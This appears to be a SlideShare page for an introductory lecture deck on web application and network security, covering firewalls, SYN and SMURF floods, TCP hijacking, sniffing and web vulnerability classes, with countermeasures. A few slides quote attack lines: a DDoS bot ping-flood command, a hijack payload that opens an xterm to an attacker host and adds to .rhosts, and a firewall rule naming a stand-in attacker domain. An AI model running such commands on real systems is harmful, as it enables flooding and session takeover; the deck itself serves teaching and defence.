Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Web Application and
network security
Rishabh Mehan
Saying Hello !!
 To start off with the introduction lets go through few
basics
 What is a Web Application ?
 Where is i...
Web Application
Protocols
 HTTP – HTTPS

 FTP – SFTP
 TCP
 SSH
Request Methods
GET

POST

Form data encoded in the URL

Data is included in the body of the
request

GET
http://www.mysit...
How Request flows

Server
www.mybank.com
(64.58.76.230)

Port: 80

Client PC
(10.1.0.123)

Request
Response
Words of Wisdom
“Every program has at least two purposes: the one for
which it was written, and another for which it wasn'...
infrastructure
Very complex architectures,
multiple platforms, multiple
protocols

Web Application
HTTP
Network

Business
...
Why vulnerabilities
Security
Professionals
Don‟t Know The
Applications
“As a Network Security
Professional, I don‟t
know h...
Common security attacks and
their countermeasures
 Finding a way into the network
 Firewalls

 Exploiting software bugs...
Firewalls
 Basic problem – many network applications and
protocols have security problems that are fixed over
time
 Diff...
Firewalls
Internet

DMZ
Firewall

Firewall

Web server, email
server, web
proxy, etc

Intranet
Firewalls
 What does a firewall rule look like?
 Depends on the firewall used

 Example: ipfw
 /sbin/ipfw add deny tcp...
Denial of Service
 Purpose: Make a network service unusable, usually by
overloading the server or network

 Many differe...
Denial of Service
 SYN flooding attack
 Send SYN packets with bogus source address
 Why?

 Server responds with SYN AC...
Denial of Service
Denial of Service
 SMURF
 Source IP address of a broadcast ping is forged
 Large number of machines respond back to vic...
Denial of Service
ICMP echo (spoofed source address of victim)
Sent to IP broadcast address
ICMP echo reply

Internet

Per...
Denial of Service
 Distributed Denial of Service
 Same techniques as regular DoS, but on a much larger
scale
 Example: ...
TCP Attacks
 Recall how IP works…
 End hosts create IP packets and routers process them
purely based on destination addr...
TCP Attacks
 TCP connections have associated state
 Starting sequence numbers, port numbers

 Problem – what if an atta...
TCP Attacks
 If an attacker learns the associated TCP state for the
connection, then the connection can be hijacked!

 A...
TCP Attacks
 Say hello to Alice, Bob and Mr. Big Ears
TCP Attacks
 Alice and Bob have an established TCP connection
TCP Attacks
 Mr. Big Ears lies on the path between Alice and Bob on
the network
 He can intercept all of their packets
TCP Attacks
 First, Mr. Big Ears must drop all of Alice‟s packets since
they must not be delivered to Bob (why?)

Packets...
TCP Attacks
 Then, Mr. Big Ears sends his malicious packet with the
next ISN (sniffed from the network)

ISN, SRC=Alice
TCP Attacks
 What if Mr. Big Ears is unable to sniff the packets
between Alice and Bob?
 Can just DoS Alice instead of d...
TCP Attacks
 Why are these types of TCP attacks so dangerous?

Web server

Trusting web client

Malicious user
TCP Attacks
 How do we prevent this?

 IPSec
 Provides source authentication, so Mr. Big Ears cannot
pretend to be Alic...
Packet Sniffing
 Recall how Ethernet works …
 When someone wants to send a packet to some else
…

 They put the bits on...
Packet Sniffing
 How can we protect ourselves?
 SSH, not Telnet
 Many people at CMU still use Telnet and send their pas...
Web Application Vulnerabilities
Web application vulnerabilities occur
in multiple areas.
Application
Administration
Extens...
What the #@$& is happening ???
%
Info
Disclosure, 3

Info Disclosure
Axis Title

File Include

File Include

Input Valdati...
Web Application Vulnerabilities
Platform:
 Known vulnerabilities can be

Platform
Known
Vulnerabilities

exploited immedi...
Web Application Vulnerabilities
Administration:
Administration
Extension Checking
Common File Checks
Data Extension
Checki...
Web Application Vulnerabilities
Application Programming:

•

Application
Application Mapping
Cookie Manipulation
Custom Ap...
Examples
 http://demo.testfire.net/

 http://chat.wallhood.com/moving/moving/images/
How to Secure Web Applications
 Incorporate security into the lifecycle
 Apply information security principles to all
so...
Are We still Secure ?

LOL
NO
Questions ?
Oss   web application and network security
Upcoming SlideShare
Loading in …5
×
Upcoming SlideShare
Authentication Application in Network Security NS4
Next
Download to read offline and view in fullscreen.

0

Share

Download to read offline

Oss web application and network security

Download to read offline

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all
  • Be the first to like this

Oss web application and network security

  1. 1. Web Application and network security Rishabh Mehan
  2. 2. Saying Hello !!  To start off with the introduction lets go through few basics  What is a Web Application ?  Where is it Deployed ?  How can it be reached ?
  3. 3. Web Application
  4. 4. Protocols  HTTP – HTTPS  FTP – SFTP  TCP  SSH
  5. 5. Request Methods GET POST Form data encoded in the URL Data is included in the body of the request GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1 POST http://www.mysite.com/kgsearch/search.php HTTP/1.1 Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ catid=1
  6. 6. How Request flows Server www.mybank.com (64.58.76.230) Port: 80 Client PC (10.1.0.123) Request Response
  7. 7. Words of Wisdom “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis
  8. 8. infrastructure Very complex architectures, multiple platforms, multiple protocols Web Application HTTP Network Business Logic Customer Identification Media Store Browser Web Servers Database Server Presentation Layer Wireless Application Server Content Services Access Controls Transaction Information Core Business Data
  9. 9. Why vulnerabilities Security Professionals Don‟t Know The Applications “As a Network Security Professional, I don‟t know how my companies web applications are supposed to work so I deploy a protective solution…but don‟t know if it‟s protecting what it‟s supposed to.” The Web Application Security Gap Application Developers and QA Professionals Don‟t Know Security “As an Application Developer, I can build great features and functions while meeting deadlines, but I don‟t know how to develop my web application with security as a feature.”
  10. 10. Common security attacks and their countermeasures  Finding a way into the network  Firewalls  Exploiting software bugs, buffer overflows  Intrusion Detection Systems  Denial of Service  Ingress filtering, IDS  TCP hijacking  IPSec  Packet sniffing  Encryption (SSH, SSL, HTTPS)  Social problems  Education
  11. 11. Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time  Difficult for users to keep up with changes and keep host secure  Solution  Administrators limit access to end hosts by using a firewall  Firewall is kept up-to-date by administrators
  12. 12. Firewalls Internet DMZ Firewall Firewall Web server, email server, web proxy, etc Intranet
  13. 13. Firewalls  What does a firewall rule look like?  Depends on the firewall used  Example: ipfw  /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls  Different graphical user interfaces  Varying amounts of complexity and power
  14. 14. Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks  SYN flooding  SMURF  Distributed attacks
  15. 15. Denial of Service  SYN flooding attack  Send SYN packets with bogus source address  Why?  Server responds with SYN ACK and keeps state about TCP half-open connection  Eventually, server memory is exhausted with this state  Solution: use “SYN cookies”  In response to a SYN, create a special “cookie” for the connection, and forget everything else  Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
  16. 16. Denial of Service
  17. 17. Denial of Service  SMURF  Source IP address of a broadcast ping is forged  Large number of machines respond back to victim, overloading it
  18. 18. Denial of Service ICMP echo (spoofed source address of victim) Sent to IP broadcast address ICMP echo reply Internet Perpetrator Victim
  19. 19. Denial of Service  Distributed Denial of Service  Same techniques as regular DoS, but on a much larger scale  Example: Sub7Server Trojan and IRC bots  Infect a large number of machines with a “zombie” program  Zombie program logs into an IRC channel and awaits commands  Example:  Bot command: !p4 207.71.92.193  Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000  Sends 10,000 64k packets to the host (655MB!)  Read more at: http://grc.com/dos/grcdos.htm
  20. 20. TCP Attacks  Recall how IP works…  End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery  Source address – host may trick destination into believing that the packet is from a trusted source  Especially applications which use IP addresses as a simple authentication method  Solution – use better authentication methods
  21. 21. TCP Attacks  TCP connections have associated state  Starting sequence numbers, port numbers  Problem – what if an attacker learns these values?  Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)  Sequence numbers are sometimes chosen in very predictable ways
  22. 22. TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source  Ex. Instead of downloading and running new program, you download a virus and execute it
  23. 23. TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears
  24. 24. TCP Attacks  Alice and Bob have an established TCP connection
  25. 25. TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network  He can intercept all of their packets
  26. 26. TCP Attacks  First, Mr. Big Ears must drop all of Alice‟s packets since they must not be delivered to Bob (why?) Packets The Void
  27. 27. TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice
  28. 28. TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?  Can just DoS Alice instead of dropping her packets  Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted?  Mitnick: payload is “add self to .rhosts”  Or, “xterm -display MrBigEars:0”
  29. 29. TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client Malicious user
  30. 30. TCP Attacks  How do we prevent this?  IPSec  Provides source authentication, so Mr. Big Ears cannot pretend to be Alice  Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
  31. 31. Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn‟t get any easier to figure out what data is being transmitted over the network!
  32. 32. Packet Sniffing  How can we protect ourselves?  SSH, not Telnet  Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)  Now that I have told you this, please do not exploit this information  Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL  Especially when making purchases with credit cards!  SFTP, not FTP  Unless you really don‟t care about the password or data  Can also use KerbFTP (download from MyAndrew)  IPSec  Provides network-layer confidentiality
  33. 33. Web Application Vulnerabilities Web application vulnerabilities occur in multiple areas. Application Administration Extension Checking Common File Checks Platform Known Vulnerabilities Application Mapping Custom Application Scripting Data Extension Checking Parameter Manipulation Backup Checking Reverse Directory Transversal Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing Cookie Manipulation Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting
  34. 34. What the #@$& is happening ??? % Info Disclosure, 3 Info Disclosure Axis Title File Include File Include Input Valdation Input Valdation Auth Auth % SQL Injection SQL Injection XSS XSS 0 10 20 30 Axis Title 40 50
  35. 35. Web Application Vulnerabilities Platform:  Known vulnerabilities can be Platform Known Vulnerabilities exploited immediately with a minimum amount of skill or experience – “script kiddies”  Most easily defendable of all web vulnerabilities  MUST have streamlined patching procedures
  36. 36. Web Application Vulnerabilities Administration: Administration Extension Checking Common File Checks Data Extension Checking • • • Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing • • Less easily corrected than known issues Require increased awareness More than just configuration, must be aware of security flaws in actual content Remnant files can reveal applications and versions in use Backup files can reveal source code and database connection strings
  37. 37. Web Application Vulnerabilities Application Programming: • Application Application Mapping Cookie Manipulation Custom Application Scripting Parameter Manipulation Reverse Directory Transversal Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting Common coding techniques do not necessarily include security • Input is Administration assumed to be valid, but not tested • Unexamined input from a browser can inject scripts into page for replay against later visitors • Unhandled error messages reveal application and database structures • Unchecked database calls can be „piggybacked‟ with a hacker‟s own database call, giving direct access to business data through a web browser
  38. 38. Examples  http://demo.testfire.net/  http://chat.wallhood.com/moving/moving/images/
  39. 39. How to Secure Web Applications  Incorporate security into the lifecycle  Apply information security principles to all software development efforts  Educate  Issue awareness, Training, etc…
  40. 40. Are We still Secure ? LOL NO
  41. 41. Questions ?

Views

Total views

718

On Slideshare

0

From embeds

0

Number of embeds

89

Actions

Downloads

15

Shares

0

Comments

0

Likes

0

×